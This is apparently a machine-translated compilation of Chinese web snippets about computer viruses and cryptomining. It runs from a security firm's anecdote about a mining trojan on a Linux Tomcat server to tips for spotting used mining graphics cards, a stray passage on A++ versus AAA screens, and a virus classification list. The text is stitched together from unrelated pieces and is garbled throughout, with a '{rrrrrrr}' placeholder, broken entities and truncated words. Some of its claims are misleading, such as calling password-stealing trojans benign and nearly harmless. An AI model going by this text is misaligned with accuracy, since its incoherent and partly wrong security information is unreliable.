How to judge whether the computer has been invaded and mined
and find the whole system of Yudian terminal in the proct
and then choose to apply for the use of Tencent Yudian, and then use the virus killing function to kill the virus
as there are not only GPUs, but also video memory, power supply unit and a large number of chip resistor capacitor components on the graphics card, long-term mining will lead to aging of some components, so the life of this kind of graphics card is worrying. But as long as the CPU heat dissipation has been good, basically do not worry, the vast majority can continue to serve for a long time.
a new customer recently consulted with sine security company, saying that his server often fails to open the website of the card, and the remote connection to the server is extremely slow. Sometimes the Ping value reaches 300-500, and he often switches. After listening to the customer's words,
will generally judge that he has been attacked by CC + DDoS mixed traffic, It's strange to say that there is no traffic attack on the computer room. It's not a traffic attack, but it also causes the server card and website to fail to open. What kind of attack is this? In order to solve the problem of
client server card, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server
{rrrrrrr}
Mining Trojan horse is also designed. If the mining process is forced to stop by customers, it will automatically start to continue mining to achieve uninterrupted mining.
careful inspection shows that it is through setting the hourly task plan, remotely downloading shell mining Trojan horse, and then executing, Check whether the current process exists or not. If not, start the Trojan horse to mine
a detailed security inspection was carried out on the client's Linux server. It was found that fortunately, there was no encrypted server data, and the worm was infected with the disease through the security detection and analysis of our security engineers, we found that the server uses Apache Tomcat environment, the open architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache, Through this vulnerability, the intruder can directly invade the server and get the administrator permission of the server,
virus. If the data was encrypted, the loss would be great. The client was a platform, and the client's data was very important. After finding out the mining Trojan horse,
do customers need to know how the server is attacked? Was the Trojan horse uploaded? It can prevent the attack
in the later stage
sine security engineer immediately repairs the Apache vulnerability and clears the Trojan horse. So far, the problem has been solved, the client server
runs stably, and the network station opens normally
Mining is burning graphics card, the following methods can identify their own graphics card is mine card
1: through the naked eye to identify whether the hardware is mine card, in fact, through other ways can also be measured, for example, you go to the computer to test the overclocking performance of the mine card, to compare with the official data, to test the stability of the power supply of the mine card, It can also be measured whether it is a mine card or not
2: the first point is to see if there are any dirt and oil stains on the mine card. If not, it proves that the seller may have done better treatment, or it is not the mine card. If the mine card is very dirty, nine times out of ten it is the mine card. Then we have to carry out the next operation, that is to open the mine card
3: we should pay attention to whether there is an invoice with warranty. The warranty can be guaranteed at the warranty points all over the country, which is not a mine card
extended information
how to avoid buying mine cards: try to buy new cards at the official flagship store of Taobao Jingdong, and if you want to buy second-hand graphics cards cheaply, you can't guarantee it
if the budget is really limited and you have to buy second-hand graphics cards, you should also try your best to buy them by yourself. Don't believe that Internet cafes or studios or companies go bankrupt. Most of the cards bought through this channel are mine cards. Of course, if the indivial buyer has a large number of graphics cards in his hand, please be careful. This probability is also mine cards. Finally, I hope you can avoid mine card, buy your favorite graphics card, happy game
1. The computer runs abnormally slowly
2. The computer crashes abnormally / gets stuck
3. Nothing is turned on, but the CPU occupancy rate is very high
4. The network is slow and a large number of network requests appear
Hello, 3a and AAA are the same
A + + is the best screen, AAA screen is equal to a + screen, quality control is also relatively good screen, no bad points
However, considering the quality, a + + is more cost-effectivecomputer failure is not only caused by virus infection, but also caused by software and hardware failure of the computer itself, and permission setting on the network. Only when we fully understand the differences and connections between the two can we make a correct judgment and discover the real virus in time. Next, I will briefly list some common computer failure symptoms caused by virus, software and hardware failure<
symptoms: the possibility of virus invasion, the possibility of software and hardware failure
frequent crash: the virus has opened many files or occupied a lot of memory; Unstable (such as poor memory quality, poor hardware overclocking performance, etc.); Running large capacity software takes up a lot of memory and disk space; Some test software is used (there are many bugs); Insufficient hard disk space, etc; When running the software on the network, it often crashes, perhaps because the network speed is too slow, the running program is too large, or the hardware configuration of the workstation is too low
the system cannot start: the virus has modified the boot information of the hard disk, or deleted some boot files. If the boot type virus boot file is damaged; The hard disk is damaged or the parameter setting is incorrect; System files are deleted by mistake
the file cannot be opened: the file format has been modified by the virus; The virus modified the file link location. Document damage; The hard disk is damaged; The link location corresponding to the file shortcut has changed; The original file editing software has been deleted; If it is in the LAN, it shows that the file storage location in the server has changed, and the workstation does not wash the contents of the new server in time (the resource manager has been opened for a long time)
it is often reported that there is not enough memory: viruses illegally occupy a large amount of memory; Open a large number of software; Running the software that needs memory resources; Incorrect system configuration; Memory is not enough (at present, the basic memory requirement is 128M)
prompt that the hard disk space is not enough: the virus has copied a large number of virus files (several cases have been encountered. Sometimes, if a Win98 or winnt4.0 system is installed on the nearly 10g hard disk of the good end, it will say that there is no space. Once the software is installed, it will prompt that the hard disk space is not enough. The capacity of each partition of the hard disk is too small; Installed a large number of large capacity software; All the software is installed in one partition; The hard disk itself is small; If it is in the LAN, the system administrator sets the workstation user's & quot; Private disk & quot; Due to the limited space, you can view the size of the entire network disk; Private disk & quot; We've run out of capacity
when the floppy disk and other devices are not accessed, the read / write signal is: virus infection; The floppy disk has been removed and the file that was opened in the floppy disk has been opened
there are a large number of unknown files: virus replication files; It may be temporary files generated in some software installation; It may also be the configuration information and running records of some software
black screen startup: virus infection (I remember 4.26 in 1998, I paid thousands of yuan for CIH, the first time I turned on the windows screen that day, it crashed, and the second time I turned on it, there was nothing left); Display failure; Display card failure; Main board failure; Excessive overclocking; CPU damage, etc.
data loss: the file is deleted by the virus; The hard disk sector is damaged; The original file is covered e to the recovery of the file; If it is a file on the network, it may be deleted by other users by mistake
keyboard or mouse lock up for no reason: virus makes trouble, pay special attention to & quot; Trojan Horse & quot;; The keyboard or mouse is damaged; The keyboard or mouse interface on the motherboard is damaged; Running a keyboard or mouse lock program, the program is too large, the system is very busy for a long time, showing that pressing the keyboard or mouse does not work
the system runs slowly: the virus takes up memory and CPU resources, and runs a large number of illegal operations in the background; Low hardware configuration; Too many or too large open programs; Incorrect system configuration; If you are running programs on the network, most of them are e to the low configuration of your machine. It is also possible that the network is busy and many users open a program at the same time; Another possibility is that you don't have enough hard disk space to temporarily exchange data when running programs
the system automatically performs operations: the virus performs illegal operations in the background; The user has set the automatic running of the program in the registry or startup group; Some software needs to restart the system automatically after installation or upgrade
through the above analysis and comparison, we know that in fact, most of the faults may be caused by human or software or hardware faults. When we find an exception, we should not rush to make an assertion. In the case that antivirus can not solve the problem, we should carefully analyze the characteristics of the fault and eliminate the possibility of software, hardware and human
virus classification and their respective characteristics
in order to truly identify the virus and timely check and kill the virus, we still need to have a more detailed understanding of the virus, and the more detailed the better
viruses are written by many scattered indivials or organizations, and there is no standard to measure and divide them. Therefore, the classification of viruses can be roughly divided from multiple perspectives
according to the infected objects, viruses can be divided into the following categories:
A, boot viruses
this kind of viruses attack the boot sector of the disk, so that the system can get the priority execution right at startup, so as to control the whole system, So the loss is relatively large. Generally speaking, the system will not start normally, but it is easier to check and kill this kind of virus. Most antivirus software can check and kill this kind of virus, such as kv300, kill series, etc
b, file virus
in the early stage, this kind of virus usually infects the executable file with the extension of exe, com, etc. in this way, when you execute an executable file, the virus program will be activated. Recently, some viruses have infected files with DLL, OVL, Sys extensions. Because these files are usually the configuration and link files of a program, the virus will be automatically loaded when a program is executed. The way to load them is to insert the whole paragraph of virus code into the blank bytes of these files. For example, CIH virus splits itself into 9 segments and embeds them into the executable file of PE structure. After infection, the number of bytes of the file usually does not increase, which is its hidden side
C, network virus
this kind of virus is the proct of the rapid development of network in recent years, the infected object is no longer limited to a single mode and a single executable file, but more comprehensive and more hidden. Now some network viruses can infect almost all office files, such as word, Excel, e-mail and so on. Its attack mode has also changed, from the original deletion and modification of files to file encryption and stealing useful information (such as hacker program) of users, the way of transmission has also undergone a qualitative leap, no longer limited to disk, but through more hidden network, such as e-mail, electronic advertising, etc
D, complex virus
classify it as & quot; Complex virus;, Because they have & quot; Guided & quot; And & quot; File type & quot; Some of the characteristics of viruses are that they can infect the boot sector file of the disk or the executable file. If this kind of virus is not completely removed, the resial virus can recover itself, and it will also infect the boot sector file and the executable file. Therefore, it is very difficult to check and kill this kind of virus, The antivirus software used should have the function of checking and killing two kinds of viruses at the same time
the above is divided according to the object of virus infection. If it is divided according to the degree of virus damage, we can divide viruses into the following categories:
A, benign viruses:
the reason why these viruses call them benign viruses is that the purpose of their invasion is not to destroy your system, but just to play, Most of them are primary virus enthusiasts who want to test their level of developing virus programs. They don't want to destroy your system. They just make some sound or give some hints. They have no harm except taking up a certain amount of hard disk space and CPU processing time. Such as some trojan virus program is also like this, just want to steal some communication information in your computer, such as password, IP address, in case of need
b, malignant virus
we classify viruses that only cause interference to software system, steal information, modify system information, and will not cause serious consequences such as hardware damage and data loss as & quot; Malignant virus;, After this kind of virus invades the system, there is no other loss except that it cannot be used normally. After the system is damaged, it usually needs to reload some files of the system to recover. Of course, it still needs to kill these viruses and then reload the system
C, extremely virulent virus
this kind of virus is more damaged than the above-mentioned type B virus. Generally, if you are infected with this kind of virus, your system will crash completely, and you will not be able to start normally at all. The useful data you keep in your hard disk may not be available, and the lighter thing is to delete system files and applications
D, catastrophic virus
we can know the damage degree from its name. This kind of virus usually destroys the boot sector file of the disk, modifies the file allocation table and hard disk partition table, and causes the system to be unable to start at all. Sometimes it even formats or locks your hard disk, making it impossible for you to use the hard disk. Once infected with this kind of virus, your system will be difficult to recover, and the data kept in the hard disk will be difficult to obtain. The loss caused is very huge. So when should we prepare for the worst, especially for enterprise users, we should make full use of catastrophic backup. Fortunately, most large enterprises have realized the significance of backup, Spend a lot of money on daily system and data backup, although we all know that it may not be possible to encounter such disastrous consequences in a few years, we still relax; In case & quot;. Nestle, where I live, is like this, and it also attaches great importance to this issue. For example, the outbreak of CIH virus on April 26, 1998 can be classified as this kind, because it not only damages the software, but also directly damages the hard disk, BIOS and other hardware of the motherboard
according to the way of invasion, it can be divided into the following types:
A. source code embedding attack type
from its name, we know that the main source program of this kind of virus invasion is high-level language source program. The virus inserts virus code before the source program is compiled, and finally is compiled into executable file together with the source program, In this way, the newly generated file is a poisonous file. Of course, there are very few such documents because of these diseases
try to choose the famous one, Comodo is recommended for the firewall, and Microsoft's patch is also available. These are suspicious online searches. Then recommend a small tool - Dangerous port closure software, to prevent hackers from invading these ports.